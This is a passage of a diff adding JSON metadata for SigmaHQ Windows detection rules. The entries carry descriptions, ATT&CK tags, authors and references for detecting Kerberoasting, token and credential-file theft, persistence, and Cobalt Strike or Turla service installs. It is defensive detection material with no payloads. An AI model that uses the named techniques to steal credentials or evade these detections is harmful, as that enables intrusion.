RC4 Ticket Encryption", + "meta": { + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ], + "creation_date": "2017/02/06", + "filename": "win_security_susp_rc4_kerberos.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ], + "creation_date": "2019/11/15", + "filename": "win_security_susp_rottenpotato.yml", + "author": "@SBousseaden, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2017/06/09", + "filename": "win_security_susp_samr_pwset.yml", + "author": "Dimitrios Slamaris", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_creation.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + 
"attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_delete.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update", + "meta": { + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ], + "creation_date": "2022/12/05", + "filename": "win_security_susp_scheduled_task_update.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete", + "meta": { + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ], + "creation_date": "2017/06/14", + "filename": "win_security_susp_sdelete.yml", + 
"author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification", + "meta": { + "refs": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2019/02/05", + "filename": "win_security_susp_time_modification.yml", + "author": "@neu5ron", + "level": "low", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detection of logins performed with WMI", + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2019/12/04", + "filename": "win_security_susp_wmi_login.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "uuid": 
"586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_svcctl_remote_service.yml", + "author": "Samir Bousseaden", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2019/08/12", + "filename": "win_security_syskey_registry_access.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion", + "meta": { + "refs": [ + "https://twitter.com/Flangvik/status/1283054508084473861", + "https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/07/14", + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "win_security_tap_driver_installation.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ], + "creation_date": 
"2022/09/16", + "filename": "win_security_teams_suspicious_objectaccess.yml", + "author": "@SerkinValery", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ], + "creation_date": "2019/10/22", + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/03/14", + "filename": "win_security_user_added_to_local_administrators.yml", + "author": "Florian Roth", + "level": 
"medium", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ], + "creation_date": "2019/10/24", + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation", + "meta": { + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ], + "creation_date": "2019/04/18", + "filename": "win_security_user_creation.yml", + "author": "Patrick Bareiss", + "level": "low", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User", + "meta": { + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/04/08", + "filename": 
"win_security_user_driver_loaded.yml", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "level": "medium", + "falsepositive": [ + "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_user_logoff.yml", + "author": "frack113", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the registration of the security event source VSSAudit. 
It would usually trigger when volume shadow copy operations happen.", + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "informational", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security", + "meta": { + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ], + "creation_date": "2017/08/22", + "filename": "win_security_wmi_persistence.yml", + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown (data set is too small; further testing needed)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "value": "Microsoft Defender Blocked from Loading Unsigned DLL", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Code Integrity (CI) engine blocking processes from loading 
unsigned DLLs residing in suspicious locations", + "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "value": "Unsigned Binary Loaded From Suspicious Location", + "meta": { + "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/03", + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "value": "HybridConnectionManager Service Running", + "meta": { + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ], + "creation_date": "2021/04/12", + "filename": "win_hybridconnectionmgr_svc_running.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "value": "Suspicious Application Installed", + "meta": { + "refs": [ + "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_shell_core_susp_packages_installed.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Packages or applications being legitimately used by users or administrators" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "value": "Suspicious Rejected SMB Guest Logon From IP", + "meta": { + "refs": [ + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ], + "creation_date": "2021/06/30", + "filename": "win_susp_failed_guest_logon.yml", + "author": "Florian Roth, KevTheHermit, fuzzyf10w", + "level": "medium", + "falsepositive": [ + "Account fallback reasons (after failed login with specific account)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + 
"uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", + "value": "Failed Mounting of Hidden Share", + "meta": { + "refs": [ + "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" + ], + "tags": [ + "attack.t1021.002", + "attack.lateral_movement" + ], + "creation_date": "2022/08/30", + "filename": "win_susp_failed_hidden_share_mount.yml", + "author": "Fabian Franz", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Faulty scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ], + "creation_date": "2022/04/26", + "filename": "win_system_application_sysmon_crash.yml", + "author": "Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install", + "meta": { + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + 
"attack.t1543.003" + ], + "creation_date": "2017/03/31", + "filename": "win_system_apt_carbonpaper_turla.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System", + "meta": { + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/03/23", + "filename": "win_system_apt_chafer_mar18_system.yml", + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install", + "meta": { + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ], + "creation_date": "2017/03/07", + "filename": "win_system_apt_stonedrill.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], 
+ "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service", + "meta": { + "refs": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ], + "creation_date": "2018/11/23", + "filename": "win_system_apt_turla_service_png.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System", + "meta": { + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/26", + "filename": "win_system_cobaltstrike_service_installs.yml", + "author": "Florian Roth, Wojciech Lesicki", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + 
{ + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/07/28", + "filename": "win_system_defender_disabled.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd, frack113", + "level": "low", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. 
